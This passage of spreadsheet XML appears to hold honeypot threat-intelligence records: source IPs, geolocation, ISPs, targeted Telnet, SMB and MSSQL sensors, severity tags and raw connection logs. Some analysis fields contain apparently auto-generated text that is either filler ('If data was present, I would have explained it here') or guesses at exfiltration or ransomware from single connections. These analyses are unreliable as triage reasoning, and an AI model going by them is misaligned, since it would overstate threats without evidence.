successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,50977)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6297)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,6306)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (201.166.173.116,22049)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c9a6:ad74"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <s v="SMB Attack &amp;&amp; SMB Scanning"/>
  </r>
  <r>
    <x v="305"/>
    <x v="305"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:10:52"/>
    <d v="2025-04-30T00:50:27"/>
    <d v="2025-04-30T01:10:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c0:816f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="306"/>
    <x v="306"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:08:16"/>
    <d v="2025-04-30T01:08:16"/>
    <d v="2025-04-30T01:08:16"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="69"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="46"/>
    <s v="Jeollanam-do"/>
    <s v="Suncheon-si"/>
    <s v="Suncheon-si"/>
    <s v="1835646"/>
    <s v="540-130"/>
    <s v="34.9506"/>
    <s v="127.487"/>
    <s v="4766"/>
    <s v="KIXS-AS-KR"/>
    <s v="Korea Telecom"/>
    <s v="corporate"/>
    <s v="Jeonnambonbujang"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b04:dee"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="307"/>
    <x v="307"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T01:03:27"/>
    <d v="2025-02-28T09:35:23"/>
    <d v="2025-04-30T01:03:27"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H24"/>
    <s v="1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JI"/>
    <s v="East Java"/>
    <s v="Kabupaten Pasuruan"/>
    <s v="Prigen"/>
    <s v="1630649"/>
    <s v="NA"/>
    <s v="-7.68333"/>
    <s v="112.617"/>
    <s v="149360"/>
    <s v="PT Indo Telemedia Solusi"/>
    <s v="PT Indo Telemedia Solusi"/>
    <s v="business"/>
    <s v="PT. SMART COMPUTER SERVICE"/>
    <s v="2023-12-29"/>
    <s v="IDNIC-SMARTCOMP-ID"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (160.19.18.59,7424)}&amp;&amp;{Data_SMB:Incoming connection (160.19.18.59,4804)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:a013:123b"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <s v="An unknown entity is attempting to connect to a shared resource on the network, possibly for unauthorized access or file transfer. This could be an attempt to exploit vulnerabilities in the system's file sharing capabilities. The source IP address suggests an external threat. &amp;&amp; A malicious user from IP address 160.19.18.59 has made an incoming connection to a shared resource on SMB protocol. This could be an attempt to gain unauthorized access or exploit vulnerabilities in the system. The user is attempting to establish a connection with a potential attack vector. &amp;&amp; A user has successfully authenticated with a server using basic credentials, potentially indicating unauthorized access or attempted login from an unknown source. This could be a malicious actor attempting to gain access to sensitive resources. The use of basic authentication is also considered insecure in modern systems. &amp;&amp; Possible malicious activity detected: Unauthenticated user attempted to authenticate on an SMB share, suggesting a brute-force or unauthorized access attempt. This may indicate a vulnerability in authentication mechanisms or a targeted attack on the system's shared resources."/>
    <s v="SMB Attack &amp;&amp; Port Scan &amp;&amp; SMB Scanning &amp;&amp; SMB Scan &amp;&amp; SMB Brute &amp;&amp; SMB Brute &amp;&amp; SMB Login &amp;&amp; SMB Brute"/>
  </r>
  <r>
    <x v="308"/>
    <x v="308"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:38:13"/>
    <d v="2025-04-30T00:38:13"/>
    <d v="2025-04-30T00:38:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:150f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="309"/>
    <x v="309"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:33:04"/>
    <d v="2023-12-04T01:37:00"/>
    <d v="2025-04-30T00:33:04"/>
    <n v="266"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;30102&amp;&amp;23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="PA"/>
    <s v="Panama"/>
    <s v="8"/>
    <s v="Panamá"/>
    <s v="Panamá District"/>
    <s v="Panama City"/>
    <s v="3703443"/>
    <s v="07188"/>
    <s v="8.99573"/>
    <s v="-79.526"/>
    <s v="21599"/>
    <s v="Cable Onda"/>
    <s v="Cable Onda"/>
    <s v="residential"/>
    <s v="Mercantile Shipstore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c82e:dff2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data is provided for analysis. _x000a__x000a_If data was present, I would have explained it here."/>
    <m/>
  </r>
  <r>
    <x v="310"/>
    <x v="310"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:21:56"/>
    <d v="2025-04-29T16:21:52"/>
    <d v="2025-04-30T00:21:56"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f19c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="311"/>
    <x v="311"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:11:28"/>
    <d v="2024-04-11T06:34:00"/>
    <d v="2025-04-30T00:11:28"/>
    <n v="118"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H35"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;27102&amp;&amp;445&amp;&amp;52899&amp;&amp;50214&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="NY"/>
    <s v="New York"/>
    <s v="Erie"/>
    <s v="Buffalo"/>
    <s v="5110629"/>
    <s v="14205"/>
    <s v="42.8864"/>
    <s v="-78.8784"/>
    <s v="36352"/>
    <s v="HostPapa"/>
    <s v="HostPapa"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64723)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64829)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49633)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49870)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59740)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,58995)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59034)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49242)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,49288)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60447)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60561)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,59916)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,60133)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63461)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63528)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,63991)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,64277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61418)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61580)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61365)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,61411)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (192.3.3.133,62047)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c003:385"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="There is insufficient information to provide analysis as there is no log data provided. &amp;&amp; Malicious activity detected: An unknown device attempted to establish an unauthorized SMB connection from IP address 192.3.3.133 to port 62047. This may indicate a potential attempt at data exfiltration or system compromise. The attacker is trying to access shared resources on the system. &amp;&amp; An unknown computer is attempting to connect to the system over SMB protocol from an IP address that may be suspicious. This could be part of a ransomware or malware attack. Malicious actors often use such connections to spread malicious files. &amp;&amp; No data provided for analysis."/>
    <m/>
  </r>
  <r>
    <x v="312"/>
    <x v="312"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:11:23"/>
    <d v="2024-03-06T08:14:00"/>
    <d v="2025-04-30T00:11:23"/>
    <n v="212"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_H35&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SSH_H31&amp;&amp;SMA-LAB_MT-CPA_H25&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;52707&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JK"/>
    <s v="Jakarta"/>
    <s v="Kota Administrasi Jakarta Barat"/>
    <s v="Jakarta"/>
    <s v="1642911"/>
    <s v="NA"/>
    <s v="-6.19062"/>
    <s v="106.765"/>
    <s v="55693"/>
    <s v="PT. Bangun Abadi Teknologi Indonesia"/>
    <s v="Bangun Abadi Teknologi Indonesia"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6712:85fd"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="313"/>
    <x v="313"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T00:10:33"/>
    <d v="2023-11-26T00:53:04"/>
    <d v="2025-04-30T00:10:33"/>
    <n v="198"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;5415&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="IDF"/>
    <s v="Île-de-France"/>
    <s v="Paris"/>
    <s v="Paris"/>
    <s v="2988507"/>
    <s v="75000"/>
    <s v="48.8566"/>
    <s v="2.35222"/>
    <s v="3215"/>
    <s v="Orange S.A."/>
    <s v="Orange"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5a3a:13fe"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, cannot analyze."/>
    <m/>
  </r>
  <r>
    <x v="314"/>
    <x v="314"/>
    <s v="n219079198231.netvigator.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:12:01"/>
    <d v="2025-03-03T05:43:48"/>
    <d v="2025-04-29T23:12:01"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HEA"/>
    <s v="Eastern"/>
    <s v="NA"/>
    <s v="Causeway Bay"/>
    <s v="1818428"/>
    <s v="NA"/>
    <s v="22.286"/>
    <s v="114.191"/>
    <s v="4760"/>
    <s v="PCCW IMS Limited"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="business"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="2003-07-07"/>
    <s v="NETVIGATOR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:db4f:c6e7"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="315"/>
    <x v="315"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:11:43"/>
    <d v="2024-02-17T10:54:28"/>
    <d v="2025-04-29T23:11:43"/>
    <n v="92"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H15&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;39778&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Hanam-si"/>
    <s v="Hanam (Sangil-ro 10-gil)"/>
    <s v="1897007"/>
    <s v="NA"/>
    <s v="37.5506"/>
    <s v="127.174"/>
    <s v="4670"/>
    <s v="Shinbiro"/>
    <s v="Shinbiro"/>
    <s v="business"/>
    <s v="Sejong Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cbf0:e08a"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="316"/>
    <x v="316"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T23:10:59"/>
    <d v="2024-04-14T11:49:05"/>
    <d v="2025-04-29T23:10:59"/>
    <n v="60"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;31020&amp;&amp;23&amp;&amp;NA&amp;&amp;46110"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="UT"/>
    <s v="Utah"/>
    <s v="Salt Lake"/>
    <s v="Salt Lake City (Rio Grande)"/>
    <s v="5780993"/>
    <s v="84101"/>
    <s v="40.7685"/>
    <s v="-111.903"/>
    <s v="13415"/>
    <s v="FirstDigital Communications, LLC"/>
    <s v="FirstDigital Communications, LLC"/>
    <s v="business"/>
    <s v="FirstDigital Communications, LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
